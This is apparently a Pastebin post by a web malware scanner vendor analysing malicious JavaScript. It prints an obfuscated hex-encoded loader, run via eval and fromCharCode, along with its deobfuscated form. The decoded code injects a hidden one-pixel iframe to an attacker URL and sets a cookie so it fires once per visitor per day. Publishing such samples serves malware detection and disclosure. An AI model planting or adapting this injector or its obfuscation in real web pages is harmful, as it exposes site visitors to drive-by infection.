SHARE
TWEET

Quttera web malware scanner detected malicious obfuscated JS

a guest Jul 27th, 2013 84 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  * Quttera web malware scanner detected obfuscated JavaScript code injecting malicious hidden iframe
  3.  */
  4.  
  5. /*
  6.  * original threat
  7.  */
  8. d = "doc" + "ument";
  9. try {
  10.     ++document.body
  11. } catch (q) {
  12.     aa = function (ff) {
  13.         for (i = 0; i < z.length; i++) {
  14.             za += String[ff](e(v + (z[i])) - 12);
  15.         }
  16.     };
  17. };
  18. ps = "split";
  19. e = (eval);
  20. v = "0x";
  21. a = 0;
  22. z = "y";
  23. try {;
  24. } catch (zz) {
  25.     a = 1
  26. }
  27. if (!a) {
  28.     try {
  29.         ++e(d)["bod" + z]
  30.     } catch (q) {
  31.         a2 = "_";
  32.     }
  33.     z = "2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_76_6d_70_7e_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_76_6d_70_7e_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_6f_6d_72_71_78_81_79_3a_7e_81_3b_80_79_7c_3b_40_42_7a_7d_75_86_78_7f_3a_7c_74_7c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_76_6d_70_7e_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_76_6d_70_7e_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16" [ps](a2);
  34.     za = "";
  35.     aa("fromCharCode");
  36.     zaz = za;
  37.     e(zaz);
  38. }
  39.  
  40.  
  41. /*
  42.  * deobfuscated code injecting hidden iframe to http://cafelum[.]ru/tmp/46nqizls.php
  43.  */
  44. function zzzfff() {
  45.     var jadr = document.createElement('iframe');
  46.     jadr.src = 'http://cafelum.ru/tmp/46nqizls.php';
  47.     jadr.style.position = 'absolute';
  48.     jadr.style.border = '0';
  49.     jadr.style.height = '1px';
  50.     jadr.style.width = '1px';
  51.     jadr.style.left = '1px';
  52.     jadr.style.top = '1px';
  53.  
  54.  
  55.  
  56.     if (!document.getElementById('jadr')) {
  57.         document.write('<div id=\'jadr\'></div>');
  58.         document.getElementById('jadr').appendChild(jadr);
  59.     }
  60. }
  61.  
  62. function SetCookie(cookieName, cookieValue, nDays, path) {
  63.     var today = new Date();
  64.     var expire = new Date();
  65.     if (nDays == null || nDays == 0) nDays = 1;
  66.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  67.     document.cookie = cookieName + "=" + escape(cookieValue)
  68.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  69. }
  70.  
  71.  
  72. function GetCookie(name) {
  73.     var start = document.cookie.indexOf(name + "=");
  74.     var len = start + name.length + 1;
  75.     if ((!start) &&
  76.         (name != document.cookie.substring(0, name.length)))
  77.     {
  78.         return null;
  79.     }
  80.  
  81.     if (start == -1) return null;
  82.     var end = document.cookie.indexOf(";", len);
  83.     if (end == -1) end = document.cookie.length;
  84.     return unescape(document.cookie.substring(len, end));
  85. }
  86.  
  87.  
  88. if (navigator.cookieEnabled)
  89. {
  90.  
  91.     /* if cookie exists do nothing, this is not unique visitor
  92.      * in another case set cookie for one day and inject hidden iframe
  93.      */
  94.     if (GetCookie('visited_uq') == 55) {} else {
  95.         SetCookie('visited_uq', '55', '1', '/');
  96.         zzzfff();
  97.     }
  98. }
RAW Paste Data
Want to get better at JavaScript?
Learn to code JavaScript in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top